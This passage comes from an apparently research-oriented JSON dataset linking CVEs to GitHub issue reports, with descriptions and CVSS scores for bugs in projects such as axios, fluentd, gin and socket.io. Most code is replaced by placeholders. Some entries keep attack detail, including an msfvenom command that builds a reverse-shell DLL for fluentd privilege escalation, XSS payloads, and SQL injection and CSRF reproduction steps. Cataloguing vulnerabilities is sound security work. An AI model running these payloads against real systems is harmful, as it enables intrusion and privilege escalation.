  58925. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  58926. "severity": "CRITICAL",
  58927. "baseScore": 9.8,
  58928. "impactScore": 5.9,
  58929. "exploitabilityScore": 3.9
  58930. },
  58931. {
  58932. "CVE_ID": "CVE-2020-28103",
  58933. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/8",
  58934. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/8",
  58935. "Repo_new": "chshcms/cscms",
  58936. "Issue_Created_At": "2020-10-26T07:07:29Z",
  58937. "description": "Cscms NUMBERTAG has sqlinjection vulnerability NUMBERTAG APITAG summary Vulnerability APITAG NUMBERTAG has sqlinjection vulnerabilities Report date NUMBERTAG Product Home: FILETAG Software link: FILETAG Version NUMBERTAG APITAG overview Vulnerability PATHTAG NUMBERTAG lines NUMBERTAG lines Vulnerability function\uff1apage_del Vulnerability param:id public function APITAG $id = $this >input >get_post('id'); if(empty($id)) getjson(L('plub NUMBERTAG if(is_array($id)){ foreach ($id as $ids) { $row=$this >db >query(\"SELECT sid,url FROM APITAG where APITAG APITAG if($row && $row >sid NUMBERTAG APITAG >url; APITAG } } }else{ $row=$this >db >query(\"SELECT sid,url FROM APITAG where APITAG APITAG if($row && $row >sid NUMBERTAG APITAG >url; APITAG } } $this APITAG >get_del('page',$id); $info FILETAG right answer: FILETAG",
  58938. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  58939. "severity": "CRITICAL",
  58940. "baseScore": 9.8,
  58941. "impactScore": 5.9,
  58942. "exploitabilityScore": 3.9
  58943. },
  58944. {
  58945. "CVE_ID": "CVE-2020-28146",
  58946. "Issue_Url_old": "https://github.com/eyoucms/eyoucms/issues/12",
  58947. "Issue_Url_new": "https://github.com/weng-xianhu/eyoucms/issues/12",
  58948. "Repo_new": "weng-xianhu/eyoucms",
  58949. "Issue_Created_At": "2020-05-29T02:15:56Z",
  58950. "description": "There is a Persistent Cross Site Scripting in the member contributions.. In the member center member contribution office, after editing the contribution content through the editor, intercept the data package, modify the parameter addonfieldext FILETAG FILETAG After the administrator logs in the background, when viewing the content submitted by the user, it triggers the payload to obtain the cookie information. FILETAG",
  58951. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  58952. "severity": "MEDIUM",
  58953. "baseScore": 6.1,
  58954. "impactScore": 2.7,
  58955. "exploitabilityScore": 2.8
  58956. },
  58957. {
  58958. "CVE_ID": "CVE-2020-28168",
  58959. "Issue_Url_old": "https://github.com/axios/axios/issues/3369",
  58960. "Issue_Url_new": "https://github.com/axios/axios/issues/3369",
  58961. "Repo_new": "axios/axios",
  58962. "Issue_Created_At": "2020-10-29T14:37:32Z",
  58963. "description": "Requests that follow a redirect are not passing via the proxy. APITAG Describe the bug In cases where axios is used by servers to perform http requests to user supplied urls, a proxy is commonly used to protect internal networks from unauthorized access and SSRF URLTAG . This bug enables an attacker to bypass the proxy by providing a url that responds with a redirect to a restricted host/ip. To Reproduce The following code spawns a proxy server that always responds with a NUMBERTAG redirect, so requests should never reach the target url, however, axios is only reaching the proxy once, and bypassing the proxy after the redirect response. URLTAG ERRORTAG The response is the rendered html at of _ FILETAG Expected behavior All the requests should pass via the proxy. In the provided scenario, there should be a redirect loop. Environment Axios Version NUMBERTAG FILETAG Version APITAG Additional APITAG Add any other context about the problem here. If applicable, add screenshots to help explain.",
  58964. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
  58965. "severity": "MEDIUM",
  58966. "baseScore": 5.9,
  58967. "impactScore": 3.6,
  58968. "exploitabilityScore": 2.2
  58969. },
  58970. {
  58971. "CVE_ID": "CVE-2020-28169",
  58972. "Issue_Url_old": "https://github.com/fluent/fluentd/issues/3201",
  58973. "Issue_Url_new": "https://github.com/fluent/fluentd/issues/3201",
  58974. "Repo_new": "fluent/fluentd",
  58975. "Issue_Created_At": "2020-12-11T16:55:44Z",
  58976. "description": "Possible Vulnerability. FILETAG Describe the bug Inappropriate folder permissions, possible escalation of privileges' on Windows To Reproduce Download URL: FILETAG Vulnerable Path: PATHTAG Steps in reproducing the exploit: Creating a DLL containing a reverse shell with the specific name that FILETAG will search: msfvenom p PATHTAG a NUMBERTAG f dll LHOST= IPADRRESS LPORT= PORT > CRYPTBASE.dll Setting up MSF console to listen for connection. Copying the DLL file that we created to PATHTAG using a limited account: Normally, a limited user might not have the possibility of restarting the service. A potential attacker can wait for the service to be restarted or he can restart the machine from command line; when the service restarts, it will trigger the DLL and get NT Authority. Expected behavior N/A Your Environment Windows NUMBERTAG If you hit the problem with older fluentd version, try latest version first. Your Configuration Default Your Error Log No errors. Additional context Please add an appropriate contact method to submit possible vulnerabilities and POC's.",
  58977. "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
  58978. "severity": "HIGH",
  58979. "baseScore": 7.0,
  58980. "impactScore": 5.9,
  58981. "exploitabilityScore": 1.0
  58982. },
  58983. {
  58984. "CVE_ID": "CVE-2020-28241",
  58985. "Issue_Url_old": "https://github.com/maxmind/libmaxminddb/issues/236",
  58986. "Issue_Url_new": "https://github.com/maxmind/libmaxminddb/issues/236",
  58987. "Repo_new": "maxmind/libmaxminddb",
  58988. "Issue_Created_At": "2020-08-04T13:43:37Z",
  58989. "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), mmdblookup (latest master e6e NUMBERTAG a URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure enable static Command line PATHTAG ip APITAG file APITAG APITAG output ERRORTAG POC FILETAG",
  58990. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  58991. "severity": "MEDIUM",
  58992. "baseScore": 6.5,
  58993. "impactScore": 3.6,
  58994. "exploitabilityScore": 2.8
  58995. },
  58996. {
  58997. "CVE_ID": "CVE-2020-28348",
  58998. "Issue_Url_old": "https://github.com/hashicorp/nomad/issues/9303",
  58999. "Issue_Url_new": "https://github.com/hashicorp/nomad/issues/9303",
  59000. "Repo_new": "hashicorp/nomad",
  59001. "Issue_Created_At": "2020-11-10T13:30:44Z",
  59002. "description": "placeholder.",
  59003. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  59004. "severity": "MEDIUM",
  59005. "baseScore": 6.5,
  59006. "impactScore": 3.6,
  59007. "exploitabilityScore": 2.8
  59008. },
  59009. {
  59010. "CVE_ID": "CVE-2020-28452",
  59011. "Issue_Url_old": "https://github.com/softwaremill/akka-http-session/issues/77",
  59012. "Issue_Url_new": "https://github.com/softwaremill/akka-http-session/issues/77",
  59013. "Repo_new": "softwaremill/akka-http-session",
  59014. "Issue_Created_At": "2020-11-24T16:51:40Z",
  59015. "description": "CSRF protection can be bypassed . Hi again, Another question about the CSRF protection. It can be bypassed by forging a request that contains the same value for both the X XSRF TOKEN header and the XSRF TOKEN cookie value. Any value will do since the only check that is now performed in APITAG is for those two values to be equal and non empty. Would it be somehow possible to conform to the OWASP recommendations described FILETAG what do you think would be the best approach? Thanks, Willem",
  59016. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  59017. "severity": "HIGH",
  59018. "baseScore": 8.8,
  59019. "impactScore": 5.9,
  59020. "exploitabilityScore": 2.8
  59021. },
  59022. {
  59023. "CVE_ID": "CVE-2020-28456",
  59024. "Issue_Url_old": "https://github.com/s-cart/s-cart/issues/52",
  59025. "Issue_Url_new": "https://github.com/s-cart/s-cart/issues/52",
  59026. "Repo_new": "s-cart/s-cart",
  59027. "Issue_Created_At": "2020-12-01T05:03:16Z",
  59028. "description": "stored XSS . Stored XSS there is a stored XSS , which is critical because an unauth user can send js code to admin panel , which cloud lead admin Account tack over. To Reproduce Steps to reproduce the behavior NUMBERTAG got to s cart store while adding product to the cart , intercept it and usei the payload in APITAG parm FILETAG NUMBERTAG after proceeding the purchase , the code will execute while trying to edit it in the amdin panel here is the POC video : URLTAG payload used = \"> APITAG alert(\"test\") APITAG",
  59029. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  59030. "severity": "MEDIUM",
  59031. "baseScore": 6.1,
  59032. "impactScore": 2.7,
  59033. "exploitabilityScore": 2.8
  59034. },
  59035. {
  59036. "CVE_ID": "CVE-2020-28457",
  59037. "Issue_Url_old": "https://github.com/s-cart/s-cart/issues/51",
  59038. "Issue_Url_new": "https://github.com/s-cart/s-cart/issues/51",
  59039. "Repo_new": "s-cart/s-cart",
  59040. "Issue_Created_At": "2020-11-29T12:19:10Z",
  59041. "description": "XSS in admin dashboard. Reflected xss in admin panel There is a cross site scripting or XSS is admin Dashboard To Reproduce NUMBERTAG the search function in admin dashboard is vulnerable for XSS URLTAG Screenshots FILETAG Fix for it :) Useing APITAG in s cart/core URLTAG will fix this issue FILETAG",
  59042. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  59043. "severity": "MEDIUM",
  59044. "baseScore": 4.8,
  59045. "impactScore": 2.7,
  59046. "exploitabilityScore": 1.7
  59047. },
  59048. {
  59049. "CVE_ID": "CVE-2020-28468",
  59050. "Issue_Url_old": "https://github.com/Gallopsled/pwntools/issues/1427",
  59051. "Issue_Url_new": "https://github.com/gallopsled/pwntools/issues/1427",
  59052. "Repo_new": "gallopsled/pwntools",
  59053. "Issue_Created_At": "2020-02-08T23:06:53Z",
  59054. "description": "Shellcraft generation fails with strings that contains end of multiline comment. APITAG ERRORTAG Bug is in APITAG , the input string ends the multi line comment so cpp fails to compile our assembly. This happens for me on APITAG : APITAG But was also reproduced on APITAG (commit id: APITAG",
  59055. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  59056. "severity": "CRITICAL",
  59057. "baseScore": 9.8,
  59058. "impactScore": 5.9,
  59059. "exploitabilityScore": 3.9
  59060. },
  59061. {
  59062. "CVE_ID": "CVE-2020-28477",
  59063. "Issue_Url_old": "https://github.com/immerjs/immer/issues/738",
  59064. "Issue_Url_new": "https://github.com/immerjs/immer/issues/738",
  59065. "Repo_new": "immerjs/immer",
  59066. "Issue_Created_At": "2021-01-19T17:50:14Z",
  59067. "description": "Prototype Pollution vulnerability . \ud83d\udc1b Bug Report A Prototype Pollution vulnerability has been raised by Snyk and it is affecting all versions of immer. Find more details here URLTAG It is currently blocking me for adding immer as a dependency to my projects. Cheers",
  59068. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  59069. "severity": "HIGH",
  59070. "baseScore": 7.5,
  59071. "impactScore": 3.6,
  59072. "exploitabilityScore": 3.9
  59073. },
  59074. {
  59075. "CVE_ID": "CVE-2020-28481",
  59076. "Issue_Url_old": "https://github.com/socketio/socket.io/issues/3671",
  59077. "Issue_Url_new": "https://github.com/socketio/socket.io/issues/3671",
  59078. "Repo_new": "socketio/socket.io",
  59079. "Issue_Created_At": "2020-10-29T20:20:39Z",
  59080. "description": "CORS Misconfiguration in socket.io. Note: This issue was originally reported to FILETAG but as per them this issue has to be fixed by you guys, thus raising it here. The details which was shared with them is given below: While testing FILETAG I found a security issue at socket.io endpoint, description for the same is given below: Vulnerability Name: Misconfigured CORS Implementation: Arbitrary & Unencrypted Origin Trusted In APITAG at socket.io endpoint Description: Cross Origin Resource Sharing (CORS) is a mechanism for relaxing the Same Origin Policy to enable communication between websites via browsers. If misconfigured, it can lead to dangerous results. An HTML5 cross origin resource sharing (CORS) policy controls whether and how content running on other domains can perform two way interaction with the domain that publishes the policy. The policy is fine grained and can apply access controls per request based on the URL and other features of the request. Analysis: During the analysis, it was observed that the application was accepting arbitrary unencrypted domains in APITAG Control Allow Origin\u201d header thus allowing domain controlled by a malicious party to send requests to the APITAG domain which can lead to API key stealing, Cross Site Scripting, Sensitive Information Disclosure, etc. Proof of Concept: FILETAG Step NUMBERTAG Login into the application and intercept the following API call URLTAG by looking at the headers it can be seen that application has implemented CORS and is allowing cross domain communication. Please note that traditional CORS exploitation won't be working here as application is properly validating the value of Origin header which is coming in request. Now, send following domain in the Origin header FILETAG CODETAG . APITAG poc in Safari Browser, it can be seen that malicious domain is able to send authenticated requests to the APITAG domain which can lead to Sensitive Information Disclosure(here in our case sid and other details are being leaked). Note: All endpoints where application is taking values from Origin and directly appending it in Access Control Allow Origin header in response, this vulnerability can be exploited. Impact NUMBERTAG Impact of Trusting Arbitrary Origin: Trusting arbitrary origins effectively disables the same origin policy, allowing two way interaction by third party web sites. Unless the response consists only of unprotected public content, this policy is likely to present a security risk. If the site specifies the header Access Control Allow Credentials: true, third party sites may be able to carry out privileged actions and retrieve sensitive information. Even if it does not, attackers may be able to bypass any IP based access controls by proxying through users' browsers NUMBERTAG Impact of trusting Unencrypted Origin If a site allows interaction from an origin that uses unencrypted HTTP communications, then it is vulnerable to an attacker who is in a position to view and modify a user's unencrypted network traffic. The attacker can control the responses from unencrypted origins, thereby injecting content that is able to interact with the application that publishes the policy. This means that the application is effectively extending trust to all such attackers, thereby undoing much of the benefit of using HTTPS communications. Recommendation: Following are the recommendations: Ensure that URLs responding with Access Control Allow Origin: do not include any sensitive content or information that might aid attacker in further attacks. Use the Access Control Allow Origin header only on chosen URLs that need to be accessed cross domain. Don't use the header for the whole domain. Allow only selected, trusted domains in the Access Control Allow Origin header. Prefer whitelisting domains over blacklisting or allowing any domain (do not use wildcard nor blindly return the Origin header content without any checks). Application shall not dynamically generate APITAG Control Allow Origin\u201d header and proper whitelisting should be done of the domains which application wants to trust. It is recommended that application shall not dynamically generate APITAG Control Allow Origin\u201d header and proper whitelisting should be done of the domains which application wants to trust. Please make sure that you only trust origins that use encrypted HTTPS communications.",
  59081. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
  59082. "severity": "MEDIUM",
  59083. "baseScore": 4.3,
  59084. "impactScore": 1.4,
  59085. "exploitabilityScore": 2.8
  59086. },
  59087. {
  59088. "CVE_ID": "CVE-2020-28483",
  59089. "Issue_Url_old": "https://github.com/gin-gonic/gin/issues/2862",
  59090. "Issue_Url_new": "https://github.com/gin-gonic/gin/issues/2862",
  59091. "Repo_new": "gin-gonic/gin",
  59092. "Issue_Created_At": "2021-09-07T19:52:25Z",
  59093. "description": "X Forwarded For handling is still unsafe, CVETAG is NOT fixed. Description APITAG / trusted proxy handling is incorrect, which makes it possible for anyone to force the value of APITAG , if: the app has trusted proxies defined and the trusted proxy handles APITAG in the usual way, by appending its own IP address at the end (the default configuration trusts every proxy and is of course also vulnerable, in a very trivial way). This was reported in URLTAG with a fix at URLTAG That PR did not get merged, and the one that did ( URLTAG does not fix the issue. There is a fix for this already at URLTAG APITAG How to reproduce You actually have that in your tests already, see URLTAG But here's a standalone version APITAG ERRORTAG Expectations APITAG Actual result APITAG APITAG Environment go version NUMBERTAG gin version (or commit ref NUMBERTAG operating system: APITAG",
  59094. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N",
  59095. "severity": "HIGH",
  59096. "baseScore": 7.1,
  59097. "impactScore": 4.2,
  59098. "exploitabilityScore": 2.8
  59099. },
  59100. {
  59101. "CVE_ID": "CVE-2020-28483",
  59102. "Issue_Url_old": "https://github.com/gin-gonic/gin/issues/2473",
  59103. "Issue_Url_new": "https://github.com/gin-gonic/gin/issues/2473",
  59104. "Repo_new": "gin-gonic/gin",
  59105. "Issue_Created_At": "2020-08-20T11:40:37Z",
  59106. "description": "X Forwarded For handling is unsafe. URLTAG If Gin is exposed directly to the internet, a client can easily spoof its client IP by simply setting an X Forwarded For header. The correct way to handle this is to require a list of trusted proxies to be configured. If unset, X Forwarded For should be ignored. I filed a similar issue against Cloud Foundry's gorouter a few years ago. cloudfoundry/gorouter NUMBERTAG In case that repo should migrate elsewhere, I'm copying the contents of the report in its entirety here: Issue X Forwarded For is passed through unfiltered, allowing anyone to spoof their origin IP. Context X Forwarded For records the path a given request has taken. The first IP is the origin client, each subsequent IP denotes a path along the way (proxies, load balancers, whatever). It's the only way for a backend service to determine the original IP, since the incoming connection is from the gorouter. However, blindly trusting the header obviously allows anyone to spoof the origin IP. Common ways to address this security problem is to only trust X Forwarded For headers from trusted sources. Examples of how to mitigate this problem: URLTAG URLTAG Steps to Reproduce Pass a X Forwarded For header with someone else's IP (e.g NUMBERTAG in it to your application, and it'll appear as though that's where the request came from. Expected result Since I'm not a trusted client, my X Forwarded For header should have been discarded, and my IP should be the first in the X Forwarded For header received by the backend. Current result The backend service will see an X Forwarded For header reading NUMBERTAG my real IP], [gorouter IP]\" (possibly more, if there's a load balancer or something in the path). It will think the request came from NUMBERTAG Possible Fix Allow specifying a list of IPs (or CIDR's) of trusted proxies and load balancers. If the request didn't come from one of them, discard the X Forwarded For. For bonus points, do what nginx does: Go through the list (starting from the last entry) and check each entry to see if it's the list of trusted proxies. When one is encountered that's not on the list, discard everything before it. All of the above also applies to X Forwarded Proto. We shouldn't trust people to say that their request was ever HTTPS if it never was.",
  59107. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N",
  59108. "severity": "HIGH",
  59109. "baseScore": 7.1,
  59110. "impactScore": 4.2,
  59111. "exploitabilityScore": 2.8
  59112. },
  59113. {
  59114. "CVE_ID": "CVE-2020-28483",
  59115. "Issue_Url_old": "https://github.com/gin-gonic/gin/issues/2232",
  59116. "Issue_Url_new": "https://github.com/gin-gonic/gin/issues/2232",
  59117. "Repo_new": "gin-gonic/gin",
  59118. "Issue_Created_At": "2020-02-11T23:31:35Z",
  59119. "description": "X Forwarded For header should be processed last to first to prevent IP spoofing. Description APITAG header should be processed last to first to prevent IP spoofing, as explained in this post URLTAG . It would be needed to set up IP addresses of known proxies to be ignored. Current implementation In FILETAG : CODETAG",
  59120. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N",
  59121. "severity": "HIGH",
  59122. "baseScore": 7.1,
  59123. "impactScore": 4.2,
  59124. "exploitabilityScore": 2.8
  59125. },
  59126. {
  59127. "CVE_ID": "CVE-2020-28487",
  59128. "Issue_Url_old": "https://github.com/visjs/vis-timeline/issues/838",
  59129. "Issue_Url_new": "https://github.com/visjs/vis-timeline/issues/838",
  59130. "Repo_new": "visjs/vis-timeline",
  59131. "Issue_Created_At": "2020-12-18T11:09:53Z",
  59132. "description": "APITAG Site Scripting (XSS). > APITAG Site Scripting (XSS) > > APITAG Site Scripting (XSS) allows clients to inject > arbitrary scripting code into application and have the server return > the script to the client in the response. This occurs because the > application is taking untrusted data and storing it without > performing any validation or output encoding. > > Reference: > FILETAG > > Steps to Reproduce: > > An example Proof Of Concept can be seen here: > URLTAG if user input is taken as a > content field (which could be the case where applications will be > using vis as a Dependency), this could result in a user injecting > malicious APITAG which will be rendered by a user. In the above > APITAG example, this is demonstrated by the insertion of<img > src='xxx' onerror='alert(/XSS/);' />. > > We wanted to know your opinion regarding this issue. I believe the > core issue here is URLTAG not validating > user input. I also believe other vis modules are affected. But I > wanted to hear your opinion on whether you think this is a security > issue or not. Do let me know what you think. Thanks.",
  59133. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:L",
  59134. "severity": "MEDIUM",
  59135. "baseScore": 6.8,
  59136. "impactScore": 4.7,
  59137. "exploitabilityScore": 2.1
  59138. },
  59139. {
  59140. "CVE_ID": "CVE-2020-28491",
  59141. "Issue_Url_old": "https://github.com/FasterXML/jackson-dataformats-binary/issues/186",
  59142. "Issue_Url_new": "https://github.com/fasterxml/jackson-dataformats-binary/issues/186",
  59143. "Repo_new": "fasterxml/jackson-dataformats-binary",
  59144. "Issue_Created_At": "2019-10-17T01:59:37Z",
  59145. "description": "[cbor] Unchecked stack allocation of byte buffer can cause ERRORTAG exception. APITAG APITAG accepts an unchecked field string length value discovered during parsing, and is used to size a stack allocated buffer. A malicious payload can be fabricated to exploit this and (at least) cause a ERRORTAG exception. ERRORTAG I am not sure how serious this is in java. With an unmanaged runtime this would be critical security vulnerability. For example, the following CBOR data (discovered by a fuzzer) leads to len NUMBERTAG and triggers this exception on my laptop. APITAG This can probably be addressed by simple sanity checking of the len value (non negative, some max limit). Also consider moving b to the heap if it does not create a performance issue.",
  59146. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  59147. "severity": "HIGH",
  59148. "baseScore": 7.5,
  59149. "impactScore": 3.6,
  59150. "exploitabilityScore": 3.9
  59151. },
  59152. {
  59153. "CVE_ID": "CVE-2020-28496",
  59154. "Issue_Url_old": "https://github.com/mrdoob/three.js/issues/21132",
  59155. "Issue_Url_new": "https://github.com/mrdoob/three.js/issues/21132",
  59156. "Repo_new": "mrdoob/three.js",
  59157. "Issue_Created_At": "2021-01-23T10:11:12Z",
  59158. "description": "APITAG in three. APITAG Hi, I would like to report a Regular Expression Denial of Service APITAG vulnerability in three. It allows cause a denial of service when handling rgb or hsl colors. The vulnerable regex is located in URLTAG To Reproduce Steps to reproduce the behavior: Code ERRORTAG I am willing to suggest that you replace the regex APITAG with APITAG",
  59159. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  59160. "severity": "HIGH",
  59161. "baseScore": 7.5,
  59162. "impactScore": 3.6,
  59163. "exploitabilityScore": 3.9
  59164. },
  59165. {
  59166. "CVE_ID": "CVE-2020-28638",
  59167. "Issue_Url_old": "https://github.com/dyne/Tomb/issues/385",
  59168. "Issue_Url_new": "https://github.com/dyne/tomb/issues/385",
  59169. "Repo_new": "dyne/tomb",
  59170. "Issue_Created_At": "2020-11-03T12:21:20Z",
  59171. "description": "[security] Any password unlocks tomb when using pinentry curses on APITAG Thank you for this tool. I've been using it for a while, and I appreciate its straightforwardness. I recently noticed that my tomb unlocks no matter what password is provided. Steps to reproduce NUMBERTAG Use tomb with pinentry curses in the $PATH NUMBERTAG Run APITAG NUMBERTAG Provide any password for APITAG NUMBERTAG Provide any password for APITAG NUMBERTAG Provide any password for APITAG (!!!) My operating system is APITAG",
  59172. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  59173. "severity": "CRITICAL",
  59174. "baseScore": 9.8,
  59175. "impactScore": 5.9,
  59176. "exploitabilityScore": 3.9
  59177. },
  59178. {
  59179. "CVE_ID": "CVE-2020-28693",
  59180. "Issue_Url_old": "https://github.com/ttimot24/HorizontCMS/issues/21",
  59181. "Issue_Url_new": "https://github.com/ttimot24/horizontcms/issues/21",
  59182. "Repo_new": "ttimot24/horizontcms",
  59183. "Issue_Created_At": "2020-11-05T06:43:07Z",
  59184. "description": "An unrestricted file upload through Themes upload function. Themes upload function will allow uploading zip file and extract content to /themes/ directory. If attacker send a zip file contain malicious php, they can executing the PHP file with URLTAG",
  59185. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  59186. "severity": "HIGH",
  59187. "baseScore": 8.8,
  59188. "impactScore": 5.9,
  59189. "exploitabilityScore": 2.8
  59190. },
  59191. {
  59192. "CVE_ID": "CVE-2020-28702",
  59193. "Issue_Url_old": "https://github.com/tomoya92/pybbs/issues/137",
  59194. "Issue_Url_new": "https://github.com/atjiu/pybbs/issues/137",
  59195. "Repo_new": "atjiu/pybbs",
  59196. "Issue_Created_At": "2020-11-05T05:58:18Z",
  59197. "description": "SQL injection vulnerability in version NUMBERTAG Official website of the manufacturer involved: URLTAG Source code download address: URLTAG Framework version NUMBERTAG ulnerability type: SQL injection Vulnerability status: not fixed Vulnerability level: high Code analysis and vulnerability recurrence\uff1a As can be seen from screenshot below(see the upper left mark of Figure NUMBERTAG for the detailed code path), the \"$\" symbol is used in the SQL statement in line NUMBERTAG of the code, resulting in a possible SQL injection vulnerability. From this SQL section, we trace back to the interface functions, and then we find that the SQL section is the topic query SQL of the user's main interface. FILETAG There is no front end filtering operation in the input box, and the existence of the vulnerability can be verified manually. Start the project, log in the front end after registering users, create a new topic with the content of NUMBERTAG and the title of \"test\", and then enter NUMBERTAG in the search bar, and no data can be APITAG enter NUMBERTAG or NUMBERTAG including spaces) , proving that there is a SQL injection vulnerability. FILETAG FILETAG FILETAG Here is the result of sqlmap\uff1a FILETAG FILETAG Here is the packet content\uff1a FILETAG GET /search?keyword NUMBERTAG HTTP NUMBERTAG Host: localhost NUMBERTAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Connection: close Referer: URLTAG Cookie: Idea NUMBERTAG cb NUMBERTAG cbcaa eb NUMBERTAG b NUMBERTAG f2fea NUMBERTAG b NUMBERTAG APITAG APITAG APITAG user_token=b8c NUMBERTAG e NUMBERTAG b7d bb NUMBERTAG e NUMBERTAG a0d0f NUMBERTAG Upgrade Insecure Requests NUMBERTAG",
  59198. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  59199. "severity": "HIGH",
  59200. "baseScore": 7.5,
  59201. "impactScore": 3.6,
  59202. "exploitabilityScore": 3.9
  59203. },
  59204. {
  59205. "CVE_ID": "CVE-2020-28705",
  59206. "Issue_Url_old": "https://github.com/daylightstudio/FUEL-CMS/issues/576",
  59207. "Issue_Url_new": "https://github.com/daylightstudio/fuel-cms/issues/576",
  59208. "Repo_new": "daylightstudio/fuel-cms",
  59209. "Issue_Created_At": "2020-11-05T02:54:39Z",
  59210. "description": "FUEL CMS NUMBERTAG Cross site request forgery (CSRF) vulnerability. In PATHTAG Cross site request forgery (CSRF) vulnerability The Attacker can use this vulnerability to delete random pages! APITAG POC CODETAG",
  59211. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
  59212. "severity": "MEDIUM",
  59213. "baseScore": 4.3,
  59214. "impactScore": 1.4,
  59215. "exploitabilityScore": 2.8
  59216. },
  59217. {
  59218. "CVE_ID": "CVE-2020-28734",
  59219. "Issue_Url_old": "https://github.com/plone/Products.CMFPlone/issues/3209",
  59220. "Issue_Url_new": "https://github.com/plone/products.cmfplone/issues/3209",
  59221. "Repo_new": "plone/products.cmfplone",
  59222. "Issue_Created_At": "2020-11-10T09:41:27Z",
  59223. "description": "Security issues in the background. Hi, I found several security issues in the background, please pay attention to deal with it address: FILETAG",
  59224. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  59225. "severity": "HIGH",
  59226. "baseScore": 8.8,
  59227. "impactScore": 5.9,
  59228. "exploitabilityScore": 2.8
  59229. },
  59230. {
  59231. "CVE_ID": "CVE-2020-28759",
  59232. "Issue_Url_old": "https://github.com/OAID/Tengine/issues/476",
  59233. "Issue_Url_new": "https://github.com/oaid/tengine/issues/476",
  59234. "Repo_new": "oaid/tengine",
  59235. "Issue_Created_At": "2020-11-11T07:31:30Z",
  59236. "description": "A buffer overflow is found in serializer. Vulnerability analysis We found that in the seriliazer module, there is a heap overflow problem Link\uff1a FILETAG The problem is in the APITAG function starting at line NUMBERTAG which calls the APITAG function at line NUMBERTAG img URLTAG The first parameter APITAG of the APITAG function points to the address space where the model file is located, and the second parameter is controlled by APITAG . For this project, the model is an input controlled by the user, so the parameters of APITAG can be controlled. img URLTAG img URLTAG Poc Download the official example model, and select the landmark model to demonstrate here. According to the official use case, the landmark model is run normally, and the program executes normally. img URLTAG Write NUMBERTAG bytes of garbage data to the header of the APITAG file, and then run the landmark model. Program routine error. img URLTAG Write NUMBERTAG bytes of garbage data to the header of the APITAG file, and then run the landmark model. program crash. img URLTAG EXP\uff1a CODETAG",
  59237. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  59238. "severity": "MEDIUM",
  59239. "baseScore": 5.5,
  59240. "impactScore": 3.6,
  59241. "exploitabilityScore": 1.8
  59242. },
  59243. {
  59244. "CVE_ID": "CVE-2020-28846",
  59245. "Issue_Url_old": "https://github.com/wh1tes/wh1te_blog/issues/8",
  59246. "Issue_Url_new": "https://github.com/wh1tes/wh1te_blog/issues/8",
  59247. "Repo_new": "wh1tes/wh1te_blog",
  59248. "Issue_Created_At": "2020-11-12T09:43:53Z",
  59249. "description": "CSRF vulnerability exist in seacms NUMBERTAG CSRF vulnerability exist in seacms NUMBERTAG Github Url: URLTAG Official website: FILETAG Through code audit, we found that there was no prevention of CSRF when the account was added in the administrator background. The key code is in APITAG FILETAG By analysis,We can confirm that there is a vulnerability here. Check Point:We forged a web page FILETAG FILETAG CODETAG And we input some String: FILETAG As result,we can found the user is added in background. FILETAG",
  59250. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  59251. "severity": "MEDIUM",
  59252. "baseScore": 6.5,
  59253. "impactScore": 3.6,
  59254. "exploitabilityScore": 2.8
  59255. },
  59256. {
  59257. "CVE_ID": "CVE-2020-28847",
  59258. "Issue_Url_old": "https://github.com/xCss/Valine/issues/348",
  59259. "Issue_Url_new": "https://github.com/xcss/valine/issues/348",
  59260. "Repo_new": "xcss/valine",
  59261. "Issue_Created_At": "2020-11-11T14:00:20Z",
